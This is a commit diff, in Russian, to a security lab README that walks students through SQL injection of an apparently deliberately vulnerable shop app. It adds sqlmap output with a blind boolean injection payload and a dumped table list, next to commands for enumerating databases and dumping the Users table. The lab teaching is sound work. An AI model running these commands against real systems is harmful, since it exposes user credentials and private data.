Изменил(а) на 'labs/lab3/README.md'

5 дней назад · fde1a10f73
--- a/labs/lab3/README.md
+++ b/labs/lab3/README.md
@ -340,7 +340,25 @@ python sqlmap.py -u http://10.5.143.101:PORT/rest/products/search?q= --level=3 -

 Если возникнет вопрос про WAF/IPS/IDS – отвечаем N.

-Программа определит тип базы данных и предложит пропустить дальнейшие проверки, отвечаем Y. На вопрос про включение всех тестов – отвечаем N. Программа начнёт искать уязвимости в параметрах запроса. После обнаружения уязвимого параметра, отвечаем N на вопрос про проверку остальных параметров. В конечном итоге, получим информацию о типе базы данных и об уязвимых параметрах. Попробуем получить информацию о количестве и названии баз данных: 
+Программа определит тип базы данных и предложит пропустить дальнейшие проверки, отвечаем Y. На вопрос про включение всех тестов – отвечаем N. Программа начнёт искать уязвимости в параметрах запроса. После обнаружения уязвимого параметра, отвечаем N на вопрос про проверку остальных параметров. В конечном итоге, получим информацию о типе базы данных и об уязвимых параметрах. 
+
+```ssh
+...
+---
+Parameter: q (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: q=') AND 9603=9603 AND ('SMUf' LIKE 'SMUf
+---
+[12:44:52] [INFO] testing SQLite
+[12:44:52] [INFO] confirming SQLite
+[12:44:52] [INFO] actively fingerprinting SQLite
+[12:44:52] [INFO] the back-end DBMS is SQLite
+back-end DBMS: SQLite
+...
+```
+
+Попробуем получить информацию о количестве и названии баз данных: 

 ```ssh
 python sqlmap.py -u http://10.5.143.101:PORT/rest/products/search?q= --dbs
@ -351,12 +369,40 @@ python sqlmap.py -u http://10.5.143.101:PORT/rest/products/search?q= --dbs

 ```ssh
 python sqlmap.py -u http://10.5.143.101:PORT/rest/products/search?q= --tables
+
+...
+[20 tables]
+-------------------+
+| Addresses         |
+| BasketItems       |
+| Baskets           |
+| Captchas          |
+| Cards             |
+| Challenges        |
+| Complaints        |
+| Deliveries        |
+| Feedbacks         |
+| ImageCaptchas     |
+| Memories          |
+| PrivacyRequests   |
+| Products          |
+| Quantities        |
+| Recycles          |
+| SecurityAnswers   |
+| SecurityQuestions |
+| Users             |
+| Wallets           |
+| sqlite_sequence   |
+-------------------+
+...
 ```

 После получения таблиц можно попробовать получить данные. Попробуем получить список пользователей из таблицы Users

 ```ssh
 python sqlmap.py -u http://10.5.143.101:PORT/rest/products/search?q= -T Users --dump
+
+
 ```

 </details>